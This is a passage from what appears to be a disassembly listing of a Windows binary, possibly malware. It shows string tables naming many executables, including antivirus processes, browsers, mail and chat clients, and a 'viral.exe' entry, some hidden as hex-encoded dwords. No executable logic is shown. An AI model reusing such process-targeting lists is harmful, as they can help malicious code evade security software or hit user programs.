dd offset aSmlogsvc_exe ; "smlogsvc.exe"
dd offset aSmss_exe ; "smss.exe"
dd offset aSndrec32_exe ; "sndrec32.exe"
dd offset aSndvol32_exe ; "sndvol32.exe"
dd offset aSol_exe ; "sol.exe"
dd offset aSort_exe ; "sort.exe"
dd offset aSpider_exe ; "spider.exe"
dd offset aSpiisupd_exe ; "spiisupd.exe"
dd offset aSpnpinst_exe ; "spnpinst.exe"
dd offset aSpoolsv_exe ; "spoolsv.exe"
dd offset aSprestrt_exe ; "sprestrt.exe"
dd offset aSpupdsvc_exe ; "spupdsvc.exe"
dd offset aStimon_exe ; "stimon.exe"
dd offset aSubrange_uce ; "subrange.uce"
dd offset aSubst_exe ; "subst.exe"
dd offset aSvchost_exe ; "svchost.exe"
dd offset aSyncapp_exe ; "syncapp.exe"
dd offset aSysedit_exe ; "sysedit.exe"
dd offset aSyskey_exe ; "syskey.exe"
dd offset aSysocmgr_exe ; "sysocmgr.exe"
dd offset aSysteminfo_exe ; "systeminfo.exe"
dd offset aSystray_exe ; "systray.exe"
dd offset aTaskkill_exe ; "taskkill.exe"
dd offset aTasklist_exe ; "tasklist.exe"
dd offset aTaskman_exe_0 ; "taskman.exe"
dd offset aTaskmgr_exe ; "taskmgr.exe"
dd offset aTcmsetup_exe ; "tcmsetup.exe"
dd offset aTcpsvcs_exe ; "tcpsvcs.exe"
dd offset aTelnet_exe ; "telnet.exe"
dd offset aTftp_exe ; "tftp.exe"
dd offset aTlntadmn_exe ; "tlntadmn.exe"
dd offset aTlntsess_exe ; "tlntsess.exe"
dd offset aTlntsvr_exe ; "tlntsvr.exe"
dd offset aTourstart_exe ; "tourstart.exe"
dd offset aTracerpt_exe ; "tracerpt.exe"
dd offset aTracert_exe ; "tracert.exe"
dd offset aTracert6_exe ; "tracert6.exe"
dd offset aTscon_exe ; "tscon.exe"
dd offset aTscupgrd_exe ; "tscupgrd.exe"
dd offset aTsdiscon_exe ; "tsdiscon.exe"
dd offset aTskill_exe ; "tskill.exe"
dd offset aTsshutdn_exe ; "tsshutdn.exe"
dd offset aTwunk_16_exe ; "twunk_16.exe"
dd offset aTwunk_32_exe ; "twunk_32.exe"
dd offset aTypeperf_exe ; "typeperf.exe"
dd offset aUnlodctr_exe ; "unlodctr.exe"
dd offset aUpnpcont_exe ; "upnpcont.exe"
dd offset aUps_exe ; "ups.exe"
dd offset aUser_exe ; "user.exe"
dd offset aUserinit_exe ; "userinit.exe"
dd offset aUsrmlnka_exe ; "usrmlnka.exe"
dd offset aUsrprbda_exe ; "usrprbda.exe"
dd offset aUsrshuta_exe ; "usrshuta.exe"
dd offset aUtilman_exe ; "utilman.exe"
dd offset aVerclsid_exe ; "verclsid.exe"
dd offset aVerifier_exe ; "verifier.exe"
dd offset aViral_exe ; "viral.exe"
dd offset aVssadmin_exe ; "vssadmin.exe"
dd offset aVssvc_exe ; "vssvc.exe"
dd offset aVwipxspx_exe ; "vwipxspx.exe"
dd offset aW32tm_exe ; "w32tm.exe"
dd offset aWextract_exe ; "wextract.exe"
dd offset aWiaacmgr_exe ; "wiaacmgr.exe"
dd offset aWinchat_exe ; "winchat.exe"
dd offset aWindbver_exe ; "WINDBVER.EXE"
dd offset aWinhlp32_exe ; "winhlp32.exe"
dd offset aWinmine_exe ; "winmine.exe"
dd offset aWinmsd_exe ; "winmsd.exe"
dd offset aWinspool_exe ; "winspool.exe"
dd offset aWinver_exe ; "winver.exe"
dd offset aWjview_exe ; "wjview.exe"
dd offset aWowdeb_exe ; "wowdeb.exe"
dd offset aWowexec_exe ; "wowexec.exe"
dd offset aWpabaln_exe ; "wpabaln.exe"
dd offset aWpnpinst_exe ; "wpnpinst.exe"
dd offset aWrite_exe ; "write.exe"
dd offset aWscntfy_exe ; "wscntfy.exe"
dd offset aWscript_exe ; "wscript.exe"
dd offset aWuauclt_exe ; "wuauclt.exe"
dd offset aWuauclt1_exe ; "wuauclt1.exe"
dd offset aWupdmgr_exe ; "wupdmgr.exe"
dd offset aXcopy_exe ; "xcopy.exe"
dd offset aAcdsee_scr ; "ACDSee.scr"
dd offset aLogon_scr ; "logon.scr"
dd offset aScrnsave_scr ; "scrnsave.scr"
dd offset aSeismosaver_sc ; "SeismoSaver.scr"
dd offset aSs3dfo_scr ; "ss3dfo.scr"
dd offset aSsbezier_scr ; "ssbezier.scr"
dd offset aSsflwbox_scr ; "ssflwbox.scr"
dd offset aSsmarque_scr ; "ssmarque.scr"
dd offset aSsmypics_scr ; "ssmypics.scr"
dd offset aSsmyst_scr ; "ssmyst.scr"
dd offset aSspipes_scr ; "sspipes.scr"
dd offset aSsstars_scr ; "ssstars.scr"
dd offset aSstext3d_scr ; "sstext3d.scr"
dd offset aSystem_1 ; "System"
dd offset aDevldr32_exe ; "devldr32.exe"
dd offset aInternat_exe ; "internat.exe"
dd offset aAti2evxx_exe ; "ati2evxx.exe"
dd offset aWudfhost_exe ; "WUDFHost.exe"
dd offset aPenservice_exe ; "penservice.exe"
dd offset aWmiexe_exe ; "wmiexe.exe"
dd offset aWinmgmt_exe ; "winmgmt.exe"
dd offset aWercon_exe ; "wercon.exe"
dd offset aTaskeng_exe ; "taskeng.exe"
dd offset aHkcmd_exe ; "hkcmd.exe"
dd offset aHotkey_exe ; "hotkey.exe"
dd offset aJusched_exe ; "jusched.exe"
dd offset aPoint32_exe ; "point32.exe"
dd offset aQttask_exe ; "qttask.exe"
dd offset aWisptis_exe ; "wisptis.exe"
dd offset aCrypserv_exe ; "crypserv.exe"
dd offset aInetinfo_exe ; "inetinfo.exe"
dd offset aIgfxpers_exe ; "igfxpers.exe"
dd offset aIgfxtray_exe ; "igfxtray.exe"
dd offset aPctspk_exe ; "pctspk.exe"
dd offset aMstask_exe ; "mstask.exe"
dd offset aSmagent_exe ; "smagent.exe"
dd offset aNmssvc_exe ; "nmssvc.exe"
dd offset aHpsysdrv_exe ; "hpsysdrv.exe"
dd offset aHpcmpmgr_exe ; "hpcmpmgr.exe"
dd offset aNhksrv_exe ; "nhksrv.exe"
dd offset aHpzipm12_exe ; "HPZipm12.exe"
dd offset aCli_exe ; "cli.exe"
dd offset aTphkmgr_exe ; "TPHKMGR.exe"
dd offset aSmax4pnp_exe ; "smax4pnp.exe"
dd offset aLoadqm_exe ; "loadqm.exe"
dd offset aLexbces_exe ; "lexbces.exe"
dd offset aDwm_exe ; "dwm.exe"
dd offset aLsm_exe ; "lsm.exe"
dd offset aMdm_exe ; "mdm.exe"
dd offset aMssearch_exe ; "mssearch.exe"
dd offset aRegsvc_exe ; "regsvc.exe"
dd offset aSdclt_exe ; "sdclt.exe"
dd offset aSlsvc_exe ; "slsvc.exe"
dd offset aHidserv_exe ; "hidserv.exe"
dd offset aUninstall__exe ; "uninstall_.exe"
dd offset aTrkwkss_exe ; "trkwkss.exe"
dd offset aWuaucpl_exe ; "wuaucpl.exe"
dd offset aTrkwksvc_exe ; "trkwksvc.exe"
dd offset aWmssvc_exe ; "wmssvc.exe"
dd offset aWmsncs_exe ; "wmsncs.exe"
dd offset aWiadss_exe ; "wiadss.exe"
dd offset aWmsnchrs_exe ; "wmsnchrs.exe"
dd offset aWrvmchars_exe ; "wrvmchars.exe"
off_448F80 dd offset dword_4439A8 ; DATA XREF: sub_41F0F5:loc_41F274�r
dd offset aAsr__exe ; "asr_*.exe"
dd offset aWmsoft_exe ; "wmsoft*.exe"
dd offset aAlcmtr_exe ; "ALCMTR.EXE"
dd offset aAlcwzrd_exe ; "ALCWZRD.EXE"
dd offset aHdashcut_exe ; "HDAShCut.exe"
dd offset aRthdcpl_exe ; "RTHDCPL.EXE"
dd offset aRtlcpl_exe ; "RTLCPL.EXE"
dd offset aMiccal_exe ; "MicCal.exe"
dd offset aRtlupd_exe ; "RtlUpd.exe"
dd offset aAlcrmv_exe ; "alcrmv.exe"
dd offset aAlcupd_exe ; "alcupd.exe"
dd offset aExplorer_exe_0 ; "explorer.exe"
dd offset aHh_exe ; "hh.exe"
dd offset aIsuninst_exe ; "IsUninst.exe"
dd offset aIun6002_exe ; "iun6002.exe"
dd offset aNotepad_exe ; "NOTEPAD.EXE"
dd offset aRegedit_exe ; "regedit.exe"
dd offset aRegtlib_exe ; "REGTLIB.EXE"
dd offset aSetdebug_exe ; "setdebug.exe"
dd offset aSetup1_exe ; "Setup1.exe"
dd offset aSoundman_exe ; "SOUNDMAN.EXE"
dd offset aSt6unst_exe ; "ST6UNST.EXE"
dd offset aTaskman_exe ; "TASKMAN.EXE"
dd offset aTwunk_16_exe ; "twunk_16.exe"
dd offset aTwunk_32_exe ; "twunk_32.exe"
dd offset aWinhelp_exe ; "winhelp.exe"
dd offset aWinhlp32_exe ; "winhlp32.exe"
dd offset aSystem_1 ; "System"
dd offset aHtpatch_exe ; "htpatch.exe"
dd offset aPoint32_exe ; "point32.exe"
dd offset aSmagent_exe ; "smagent.exe"
dd offset aSmax4pnp_exe ; "smax4pnp.exe"
dd offset aSound_exe ; "*sound*.exe"
off_449008 dd offset dword_4439A8 ; DATA XREF: sub_41F0F5:loc_41F2B1�r
dd offset aAsr__exe ; "asr_*.exe"
dd offset aWmsoft_exe ; "wmsoft*.exe"
dd offset aWmpcodecs_exe ; "wmpcodecs.exe"
dd offset aMsxml32_exe ; "msxml32.exe"
dd offset aMswupd_exe ; "mswupd.exe"
dd offset aMsnmsgr_exe ; "msnmsgr.exe"
dd offset aWmiprvse_exe ; "wmiprvse.exe"
dd offset aMsmsgs_exe ; "msmsgs.exe"
dd offset aMirc_exe ; "mirc.exe"
dd offset aXchat_exe ; "xchat.exe"
dd offset aFirefox_exe ; "firefox.exe"
dd offset aThunderbird_ex ; "thunderbird.exe"
dd offset aIexplore_exe ; "iexplore.exe"
dd offset aMsimn_exe ; "msimn.exe"
dd offset aMsoe_exe ; "msoe.exe"
dd offset aDefwatch_exe ; "defwatch.exe"
dd offset aRtvscan_exe ; "rtvscan.exe"
dd offset aCcapp_exe ; "ccapp.exe"
dd offset aAim_exe ; "aim.exe"
dd offset aCcevtmgr_exe ; "ccevtmgr.exe"
dd offset aCcsetmgr_exe ; "ccsetmgr.exe"
dd offset aIexplore_exe ; "iexplore.exe"
dd offset aWordpad_exe ; "wordpad.exe"
dd offset aSteam_exe ; "steam.exe"
dd offset aAutoexec_bat ; "AUTOEXEC.BAT"
dd offset aWmpnscfg_exe ; "wmpnscfg.exe"
dd offset aNotepad_exe_0 ; "notepad.exe"
dd offset aWvsscheduler_e ; "WVSScheduler.exe"
dd offset dword_449190
dd offset dword_449180
dd offset dword_449170
dd offset dword_449164
dd offset dword_449158
dd offset dword_449150
dd offset dword_449144
dd offset dword_449138
dd offset dword_44912C
dd offset dword_44911C
dd offset dword_449110
dd offset dword_449100
dd offset dword_4490F4
dd offset dword_4490E8
dd offset dword_4490D8
dd offset aUninstall__exe ; "uninstall_.exe"
dd offset aTrkwkss_exe ; "trkwkss.exe"
dd offset aWuaucpl_exe ; "wuaucpl.exe"
dd offset aTrkwksvc_exe ; "trkwksvc.exe"
dd offset aWmssvc_exe ; "wmssvc.exe"
dd offset aWmsncs_exe ; "wmsncs.exe"
dd offset aWiadss_exe ; "wiadss.exe"
dd offset aWmsnchrs_exe ; "wmsnchrs.exe"
dword_4490D8 dd 6C706D77h, 72657961h, 6578652Eh, 0dword_4490E8 dd 726E6977h, 652E7261h, 6578hdword_4490F4 dd 69766F6Dh, 2E6B6D65h, 657865hdword_449100 dd 61677661h, 7276736Dh, 6578652Eh, 0dword_449110 dd 63677661h, 78652E63h, 65hdword_44911C dd 75677661h, 63767370h, 6578652Eh, 0dword_44912C dd 63617061h, 652E6568h, 6578hdword_449138 dd 70616D6Eh, 6578652Eh, 0dword_449144 dd 74747570h, 78652E79h, 65hdword_449150 dd 63732E2Ah, 72hdword_449158 dd 7A6E6977h, 652E7069h, 6578hdword_449164 dd 65747563h, 2E707466h, 657865hdword_449170 dd 73616C66h, 70786668h, 6578652Eh, 0dword_449180 dd 54616554h, 72656D69h, 6578652Eh, 0dword_449190 dd 7253534Ch, 652E6376h, 6578haWvsscheduler_e db 'WVSScheduler.exe',0 ; DATA XREF: .text:00449078�o
align 10h
aWmpnscfg_exe db 'wmpnscfg.exe',0 ; DATA XREF: .text:00449070�o
align 10h
aAutoexec_bat db 'AUTOEXEC.BAT',0 ; DATA XREF: .text:0044906C�o
align 10h
aSteam_exe db 'steam.exe',0 ; DATA XREF: .text:00449068�o
align 4
aWordpad_exe db 'wordpad.exe',0 ; DATA XREF: .text:00449064�o
aCcsetmgr_exe db 'ccsetmgr.exe',0 ; DATA XREF: .text:0044905C�o
align 4
aCcevtmgr_exe db 'ccevtmgr.exe',0 ; DATA XREF: .text:00449058�o
align 4
aAim_exe db 'aim.exe',0 ; DATA XREF: .text:00449054�o
aCcapp_exe db 'ccapp.exe',0 ; DATA XREF: .text:00449050�o
align 4
aRtvscan_exe db 'rtvscan.exe',0 ; DATA XREF: .text:0044904C�o
aDefwatch_exe db 'defwatch.exe',0 ; DATA XREF: .text:00449048�o
align 4
aMsoe_exe db 'msoe.exe',0 ; DATA XREF: .text:00449044�o
align 4
aMsimn_exe db 'msimn.exe',0 ; DATA XREF: .text:00449040�o
align 10h
aThunderbird_ex db 'thunderbird.exe',0 ; DATA XREF: .text:00449038�o
aFirefox_exe db 'firefox.exe',0 ; DATA XREF: .text:00449034�o
aXchat_exe db 'xchat.exe',0 ; DATA XREF: .text:00449030�o
align 4
aMirc_exe db 'mirc.exe',0 ; DATA XREF: .text:0044902C�o
align 4
aMsmsgs_exe db 'msmsgs.exe',0 ; DATA XREF: .text:00449028�o
align 10h
aWmiprvse_exe db 'wmiprvse.exe',0 ; DATA XREF: .text:00449024�o
align 10h
aMsnmsgr_exe db 'msnmsgr.exe',0 ; DATA XREF: .text:00449020�o
aMswupd_exe db 'mswupd.exe',0 ; DATA XREF: .text:0044901C�o
align 4
aMsxml32_exe db 'msxml32.exe',0 ; DATA XREF: .text:00449018�o
aWmpcodecs_exe db 'wmpcodecs.exe',0 ; DATA XREF: .text:00449014�o
align 4
aSound_exe db '*sound*.exe',0 ; DATA XREF: .text:00449004�o
aHtpatch_exe db 'htpatch.exe',0 ; DATA XREF: .text:00448FF4�o
aWinhelp_exe db 'winhelp.exe',0 ; DATA XREF: .text:00448FE8�o
aTaskman_exe db 'TASKMAN.EXE',0 ; DATA XREF: .text:00448FDC�o
aSt6unst_exe db 'ST6UNST.EXE',0 ; DATA XREF: .text:00448FD8�o
aSoundman_exe db 'SOUNDMAN.EXE',0 ; DATA XREF: .text:00448FD4�o
align 10h
aSetup1_exe db 'Setup1.exe',0 ; DATA XREF: .text:00448FD0�o
align 4
aSetdebug_exe db 'setdebug.exe',0 ; DATA XREF: .text:00448FCC�o
align 4
aRegtlib_exe db 'REGTLIB.EXE',0 ; DATA XREF: .text:00448FC8�o
aRegedit_exe db 'regedit.exe',0 ; DATA XREF: .text:00448FC4�o
aNotepad_exe db 'NOTEPAD.EXE',0 ; DATA XREF: .text:00448FC0�o
aIun6002_exe db 'iun6002.exe',0 ; DATA XREF: .text:00448FBC�o
aIsuninst_exe db 'IsUninst.exe',0 ; DATA XREF: .text:00448FB8�o
align 4
aHh_exe db 'hh.exe',0 ; DATA XREF: .text:00448FB4�o
align 4
aExplorer_exe_0 db 'explorer.exe',0 ; DATA XREF: .text:00448FB0�o
align 4
aAlcupd_exe db 'alcupd.exe',0 ; DATA XREF: .text:00448FAC�o
align 10h
aAlcrmv_exe db 'alcrmv.exe',0 ; DATA XREF: .text:00448FA8�o
align 4
aRtlupd_exe db 'RtlUpd.exe',0 ; DATA XREF: .text:00448FA4�o
align 4
aMiccal_exe db 'MicCal.exe',0 ; DATA XREF: .text:00448FA0�o
align 4
aRthdcpl_exe db 'RTHDCPL.EXE',0 ; DATA XREF: .text:00448F98�o
aAlcwzrd_exe db 'ALCWZRD.EXE',0 ; DATA XREF: .text:00448F90�o
aAlcmtr_exe db 'ALCMTR.EXE',0 ; DATA XREF: .text:00448F8C�o
align 4
aWrvmchars_exe db 'wrvmchars.exe',0 ; DATA XREF: .text:00448F7C�o
align 4
aWmsnchrs_exe db 'wmsnchrs.exe',0 ; DATA XREF: .text:00448F78�o
; .text:004490D4�o
align 4
aWiadss_exe db 'wiadss.exe',0 ; DATA XREF: .text:00448F74�o
; .text:004490D0�o
align 4
aWmsncs_exe db 'wmsncs.exe',0 ; DATA XREF: .text:00448F70�o
; .text:004490CC�o
align 10h
aWmssvc_exe db 'wmssvc.exe',0 ; DATA XREF: .text:00448F6C�o
; .text:004490C8�o
align 4
aTrkwksvc_exe db 'trkwksvc.exe',0 ; DATA XREF: .text:00448F68�o
; .text:004490C4�o
align 4
aWuaucpl_exe db 'wuaucpl.exe',0 ; DATA XREF: .text:00448F64�o
; .text:004490C0�o
aTrkwkss_exe db 'trkwkss.exe',0 ; DATA XREF: .text:00448F60�o
; .text:004490BC�o
aUninstall__exe db 'uninstall_.exe',0 ; DATA XREF: .text:00448F5C�o
; .text:004490B8�o
align 4
aHidserv_exe db 'hidserv.exe',0 ; DATA XREF: .text:00448F58�o
aSlsvc_exe db 'slsvc.exe',0 ; DATA XREF: .text:00448F54�o
align 4
aSdclt_exe db 'sdclt.exe',0 ; DATA XREF: .text:00448F50�o
align 4
aRegsvc_exe db 'regsvc.exe',0 ; DATA XREF: .text:00448F4C�o
align 4
aMssearch_exe db 'mssearch.exe',0 ; DATA XREF: .text:00448F48�o
align 4
aMdm_exe db 'mdm.exe',0 ; DATA XREF: .text:00448F44�o
aLsm_exe db 'lsm.exe',0 ; DATA XREF: .text:00448F40�o
aDwm_exe db 'dwm.exe',0 ; DATA XREF: .text:00448F3C�o
aLexbces_exe db 'lexbces.exe',0 ; DATA XREF: .text:00448F38�o
aLoadqm_exe db 'loadqm.exe',0 ; DATA XREF: .text:00448F34�o
align 4
aSmax4pnp_exe db 'smax4pnp.exe',0 ; DATA XREF: .text:00448F30�o
; .text:00449000�o
align 4
aTphkmgr_exe db 'TPHKMGR.exe',0 ; DATA XREF: .text:00448F2C�o
aCli_exe db 'cli.exe',0 ; DATA XREF: .text:00448F28�o
aHpzipm12_exe db 'HPZipm12.exe',0 ; DATA XREF: .text:00448F24�o
align 4
aNhksrv_exe db 'nhksrv.exe',0 ; DATA XREF: .text:00448F20�o
align 4
aHpcmpmgr_exe db 'hpcmpmgr.exe',0 ; DATA XREF: .text:00448F1C�o
align 4
aHpsysdrv_exe db 'hpsysdrv.exe',0 ; DATA XREF: .text:00448F18�o
align 4
aNmssvc_exe db 'nmssvc.exe',0 ; DATA XREF: .text:00448F14�o
align 10h
aSmagent_exe db 'smagent.exe',0 ; DATA XREF: .text:00448F10�o
; .text:00448FFC�o
aMstask_exe db 'mstask.exe',0 ; DATA XREF: .text:00448F0C�o
align 4
aPctspk_exe db 'pctspk.exe',0 ; DATA XREF: .text:00448F08�o
align 4
aIgfxtray_exe db 'igfxtray.exe',0 ; DATA XREF: .text:00448F04�o
align 4
aIgfxpers_exe db 'igfxpers.exe',0 ; DATA XREF: .text:00448F00�o
align 4
aInetinfo_exe db 'inetinfo.exe',0 ; DATA XREF: .text:00448EFC�o
align 4
aCrypserv_exe db 'crypserv.exe',0 ; DATA XREF: .text:00448EF8�o
align 4
aWisptis_exe db 'wisptis.exe',0 ; DATA XREF: .text:00448EF4�o
aQttask_exe db 'qttask.exe',0 ; DATA XREF: .text:00448EF0�o
align 4
aPoint32_exe db 'point32.exe',0 ; DATA XREF: .text:00448EEC�o
; .text:00448FF8�o
aJusched_exe db 'jusched.exe',0 ; DATA XREF: .text:00448EE8�o
aHotkey_exe db 'hotkey.exe',0 ; DATA XREF: .text:00448EE4�o
align 10h
aHkcmd_exe db 'hkcmd.exe',0 ; DATA XREF: .text:00448EE0�o
align 4
aTaskeng_exe db 'taskeng.exe',0 ; DATA XREF: .text:00448EDC�o
aWercon_exe db 'wercon.exe',0 ; DATA XREF: .text:00448ED8�o
align 4
aWinmgmt_exe db 'winmgmt.exe',0 ; DATA XREF: .text:00448ED4�o
aWmiexe_exe db 'wmiexe.exe',0 ; DATA XREF: .text:00448ED0�o
align 4
aPenservice_exe db 'penservice.exe',0 ; DATA XREF: .text:00448ECC�o
align 4
aWudfhost_exe db 'WUDFHost.exe',0 ; DATA XREF: .text:00448EC8�o
align 4
aInternat_exe db 'internat.exe',0 ; DATA XREF: .text:00448EC0�o
align 4
aDevldr32_exe db 'devldr32.exe',0 ; DATA XREF: .text:00448EBC�o
align 4
aSystem_1 db 'System',0 ; DATA XREF: .text:00448EB8�o
; .text:00448FF0�o
align 4
aSstext3d_scr db 'sstext3d.scr',0 ; DATA XREF: .text:00448EB4�o
align 4
aSsstars_scr db 'ssstars.scr',0 ; DATA XREF: .text:00448EB0�o
aSspipes_scr db 'sspipes.scr',0 ; DATA XREF: .text:00448EAC�o
aSsmyst_scr db 'ssmyst.scr',0 ; DATA XREF: .text:00448EA8�o
align 4
aSsmypics_scr db 'ssmypics.scr',0 ; DATA XREF: .text:00448EA4�o
align 4
aSsmarque_scr db 'ssmarque.scr',0 ; DATA XREF: .text:00448EA0�o
align 4
aSsflwbox_scr db 'ssflwbox.scr',0 ; DATA XREF: .text:00448E9C�o
align 4
aSsbezier_scr db 'ssbezier.scr',0 ; DATA XREF: .text:00448E98�o
align 4
aSs3dfo_scr db 'ss3dfo.scr',0 ; DATA XREF: .text:00448E94�o
align 4
aSeismosaver_sc db 'SeismoSaver.scr',0 ; DATA XREF: .text:00448E90�o
aScrnsave_scr db 'scrnsave.scr',0 ; DATA XREF: .text:00448E8C�o
align 4
aLogon_scr db 'logon.scr',0 ; DATA XREF: .text:00448E88�o
align 10h
aAcdsee_scr db 'ACDSee.scr',0 ; DATA XREF: .text:00448E84�o
align 4
aXcopy_exe db 'xcopy.exe',0 ; DATA XREF: .text:00448E80�o
align 4
aWupdmgr_exe db 'wupdmgr.exe',0 ; DATA XREF: .text:00448E7C�o
aWuauclt1_exe db 'wuauclt1.exe',0 ; DATA XREF: .text:00448E78�o
align 4
aWuauclt_exe db 'wuauclt.exe',0 ; DATA XREF: .text:00448E74�o
aWscript_exe db 'wscript.exe',0 ; DATA XREF: .text:00448E70�o
aWscntfy_exe db 'wscntfy.exe',0 ; DATA XREF: .text:00448E6C�o
aWrite_exe db 'write.exe',0 ; DATA XREF: .text:00448E68�o
align 4
aWpnpinst_exe db 'wpnpinst.exe',0 ; DATA XREF: .text:00448E64�o
align 4
aWpabaln_exe db 'wpabaln.exe',0 ; DATA XREF: .text:00448E60�o
aWowexec_exe db 'wowexec.exe',0 ; DATA XREF: .text:00448E5C�o
aWowdeb_exe db 'wowdeb.exe',0 ; DATA XREF: .text:00448E58�o
align 4
aWjview_exe db 'wjview.exe',0 ; DATA XREF: .text:00448E54�o
align 4
aWinver_exe db 'winver.exe',0 ; DATA XREF: .text:00448E50�o
align 10h
aWinspool_exe db 'winspool.exe',0 ; DATA XREF: .text:00448E4C�o
align 10h
aWinmsd_exe db 'winmsd.exe',0 ; DATA XREF: .text:00448E48�o
align 4
aWinmine_exe db 'winmine.exe',0 ; DATA XREF: .text:00448E44�o
aWinhlp32_exe db 'winhlp32.exe',0 ; DATA XREF: .text:00448E40�o
; .text:00448FEC�o
align 4
aWindbver_exe db 'WINDBVER.EXE',0 ; DATA XREF: .text:00448E3C�o
align 4
aWinchat_exe db 'winchat.exe',0 ; DATA XREF: .text:00448E38�o
aWiaacmgr_exe db 'wiaacmgr.exe',0 ; DATA XREF: .text:00448E34�o
align 4
aWextract_exe db 'wextract.exe',0 ; DATA XREF: .text:00448E30�o
align 4
aW32tm_exe db 'w32tm.exe',0 ; DATA XREF: .text:00448E2C�o
align 10h
aVwipxspx_exe db 'vwipxspx.exe',0 ; DATA XREF: .text:00448E28�o
align 10h
aVssvc_exe db 'vssvc.exe',0 ; DATA XREF: .text:00448E24�o
align 4
aVssadmin_exe db 'vssadmin.exe',0 ; DATA XREF: .text:00448E20�o
align 4
aViral_exe db 'viral.exe',0 ; DATA XREF: .text:00448E1C�o
align 4
aVerifier_exe db 'verifier.exe',0 ; DATA XREF: .text:00448E18�o
align 4
aVerclsid_exe db 'verclsid.exe',0 ; DATA XREF: .text:00448E14�o
align 4
aUtilman_exe db 'utilman.exe',0 ; DATA XREF: .text:00448E10�o
aUsrshuta_exe db 'usrshuta.exe',0 ; DATA XREF: .text:00448E0C�o
align 4
aUsrprbda_exe db 'usrprbda.exe',0 ; DATA XREF: .text:00448E08�o
align 4
aUsrmlnka_exe db 'usrmlnka.exe',0 ; DATA XREF: .text:00448E04�o
align 4
aUserinit_exe db 'userinit.exe',0 ; DATA XREF: .text:00448E00�o
align 4
aUser_exe db 'user.exe',0 ; DATA XREF: .text:00448DFC�o
align 10h
aUps_exe db 'ups.exe',0 ; DATA XREF: .text:00448DF8�o
aUpnpcont_exe db 'upnpcont.exe',0 ; DATA XREF: .text:00448DF4�o
align 4
aUnlodctr_exe db 'unlodctr.exe',0 ; DATA XREF: .text:00448DF0�o
align 4
aTypeperf_exe db 'typeperf.exe',0 ; DATA XREF: .text:00448DEC�o
align 4
aTwunk_32_exe db 'twunk_32.exe',0 ; DATA XREF: .text:00448DE8�o
; .text:00448FE4�o
align 4
aTwunk_16_exe db 'twunk_16.exe',0 ; DATA XREF: .text:00448DE4�o
; .text:00448FE0�o
align 4
aTsshutdn_exe db 'tsshutdn.exe',0 ; DATA XREF: .text:00448DE0�o
align 4
aTskill_exe db 'tskill.exe',0 ; DATA XREF: .text:00448DDC�o
align 4
aTsdiscon_exe db 'tsdiscon.exe',0 ; DATA XREF: .text:00448DD8�o
align 4
aTscupgrd_exe db 'tscupgrd.exe',0 ; DATA XREF: .text:00448DD4�o
align 4
aTscon_exe db 'tscon.exe',0 ; DATA XREF: .text:00448DD0�o
align 10h
aTracert6_exe db 'tracert6.exe',0 ; DATA XREF: .text:00448DCC�o
align 10h
aTracert_exe db 'tracert.exe',0 ; DATA XREF: .text:00448DC8�o
aTracerpt_exe db 'tracerpt.exe',0 ; DATA XREF: .text:00448DC4�o
align 4
aTourstart_exe db 'tourstart.exe',0 ; DATA XREF: .text:00448DC0�o
align 4
aTlntsvr_exe db 'tlntsvr.exe',0 ; DATA XREF: .text:00448DBC�o
aTlntsess_exe db 'tlntsess.exe',0 ; DATA XREF: .text:00448DB8�o
align 4
aTlntadmn_exe db 'tlntadmn.exe',0 ; DATA XREF: .text:00448DB4�o
align 4
aTftp_exe db 'tftp.exe',0 ; DATA XREF: .text:00448DB0�o
align 4
aTelnet_exe db 'telnet.exe',0 ; DATA XREF: .text:00448DAC�o
align 10h
aTcpsvcs_exe db 'tcpsvcs.exe',0 ; DATA XREF: .text:00448DA8�o
aTcmsetup_exe db 'tcmsetup.exe',0 ; DATA XREF: .text:00448DA4�o
align 4
aTaskmgr_exe db 'taskmgr.exe',0 ; DATA XREF: .text:00448DA0�o
aTaskman_exe_0 db 'taskman.exe',0 ; DATA XREF: .text:00448D9C�o
aTasklist_exe db 'tasklist.exe',0 ; DATA XREF: .text:00448D98�o
align 4
aTaskkill_exe db 'taskkill.exe',0 ; DATA XREF: .text:00448D94�o
align 4
aSystray_exe db 'systray.exe',0 ; DATA XREF: .text:00448D90�o
aSysteminfo_exe db 'systeminfo.exe',0 ; DATA XREF: .text:00448D8C�o
align 10h
aSysocmgr_exe db 'sysocmgr.exe',0 ; DATA XREF: .text:00448D88�o
align 10h
aSyskey_exe db 'syskey.exe',0 ; DATA XREF: .text:00448D84�o
align 4
aSysedit_exe db 'sysedit.exe',0 ; DATA XREF: .text:00448D80�o
aSyncapp_exe db 'syncapp.exe',0 ; DATA XREF: .text:00448D7C�o
aSvchost_exe db 'svchost.exe',0 ; DATA XREF: .text:00448D78�o
aSubst_exe db 'subst.exe',0 ; DATA XREF: .text:00448D74�o
align 4
aSubrange_uce db 'subrange.uce',0 ; DATA XREF: .text:00448D70�o
align 4
aStimon_exe db 'stimon.exe',0 ; DATA XREF: .text:00448D6C�o
align 4
aSpupdsvc_exe db 'spupdsvc.exe',0 ; DATA XREF: .text:00448D68�o
align 4
aSprestrt_exe db 'sprestrt.exe',0 ; DATA XREF: .text:00448D64�o
align 4
aSpoolsv_exe db 'spoolsv.exe',0 ; DATA XREF: .text:00448D60�o
aSpnpinst_exe db 'spnpinst.exe',0 ; DATA XREF: .text:00448D5C�o
align 4
aSpiisupd_exe db 'spiisupd.exe',0 ; DATA XREF: .text:00448D58�o
align 4
aSpider_exe db 'spider.exe',0 ; DATA XREF: .text:00448D54�o
align 10h
aSort_exe db 'sort.exe',0 ; DATA XREF: .text:00448D50�o
align 4
aSol_exe db 'sol.exe',0 ; DATA XREF: .text:00448D4C�o
aSndvol32_exe db 'sndvol32.exe',0 ; DATA XREF: .text:00448D48�o
align 4
aSndrec32_exe db 'sndrec32.exe',0 ; DATA XREF: .text:00448D44�o
align 4
aSmss_exe db 'smss.exe',0 ; DATA XREF: .text:00448D40�o
align 10h
aSmlogsvc_exe db 'smlogsvc.exe',0 ; DATA XREF: .text:00448D3C�o
align 10h
aSmbinst_exe db 'smbinst.exe',0 ; DATA XREF: .text:00448D38�o
aSkeys_exe db 'skeys.exe',0 ; DATA XREF: .text:00448D34�o
align 4
aSigverif_exe db 'sigverif.exe',0 ; DATA XREF: .text:00448D30�o
align 4
aShutdown_exe db 'shutdown.exe',0 ; DATA XREF: .text:00448D2C�o
align 4
aShrpubw_exe db 'shrpubw.exe',0 ; DATA XREF: .text:00448D28�o
aShmgrate_exe db 'shmgrate.exe',0 ; DATA XREF: .text:00448D24�o
align 4
aShare_exe db 'share.exe',0 ; DATA XREF: .text:00448D20�o
align 10h
